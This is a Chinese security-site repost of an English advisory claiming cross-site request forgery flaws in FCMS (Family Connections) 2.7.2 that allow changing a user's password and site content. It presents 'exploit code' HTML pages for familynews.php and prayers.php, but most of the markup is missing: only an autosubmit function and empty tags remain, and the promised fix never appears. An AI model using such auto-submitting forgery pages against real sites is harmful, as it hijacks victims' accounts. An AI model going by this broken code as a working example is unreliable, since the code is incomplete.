FCMS_2.7.2 cms and earlier多个CSRF缺陷及修复

FCMS_2.7.2 cms and earlier多个CSRF缺陷及修复 - 网站安

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] 下载地址:http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download作者: Ahmed Elhady Mohamed影响版本: 2.7.2测试平台: windows XP Sp2 En概述# ......

下载地址:http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download

作者: Ahmed Elhady Mohamed

影响版本: 2.7.2

测试平台: windows XP Sp2 En

概述

# This vulnerability allows a malicious hacker to change password of a user

and also it allows changing the website information.

===================================================================================

#First we must install all optional sections during installation process.

#there are csrf in all sections in this application for examples you can add news , pray for ,

change the password and can do all functionalities are there.

#here are some examples for prove of concept

exploit code for Page "familynews.php"

#Save the following codr in a file called "code.html"

<html>

<head>

function autosubmit() {

document.getElementById('ChangeSubmit').submit();

}

</script>

</head>

</form>

</body>

</html>

#then i called "code.html" from another page

<html>

<body>

</body>

</html>

exploit code for Page "prayers.php"

#Save the following code in a file called "code.html"

<html>

<head>

function autosubmit() {

document.getElementById('ChangeSubmit').submit();

}

</script>

</head>

</form>

</body>

</html>

#then i called "code.html" from another page

<html>

<body>

</body>

</html>

后台登陆框post注入 - 网站安全 - 自学php

一次利用社会工程学完成的域名劫持攻击 - 网站

子栏目

FCMS_2.7.2 cms and earlier多个CSRF缺陷及修复 - 网站安

最新评论

添加评论

更多文章推荐

添加评论